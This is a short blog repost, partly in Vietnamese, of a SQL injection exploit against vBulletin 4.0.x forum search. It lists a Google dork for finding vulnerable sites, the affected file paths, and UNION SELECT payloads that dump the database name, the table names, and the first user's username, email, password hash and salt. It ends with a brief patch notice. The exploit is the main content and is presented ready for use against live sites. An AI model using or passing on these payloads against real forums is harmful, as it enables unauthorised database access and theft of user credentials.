Download addons firefox: Live HTTP headerds
Chú ý phải tìm từ khóa nào có kết quả hiển thị lên được nhé
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
More info: http://j0hnx3r.org/?p=818
Thank my friends from Inj3ct0r Team (1337day.com)
--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!
Use HTTP debugger...
Or please watch this video to understand more: http://www.youtube.com/watch?v=fR9RGCqIPkc
---------------------
vBulletin 4.X Security Patch
http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch?AID=804495&PID=564936
0 comments:
Post a Comment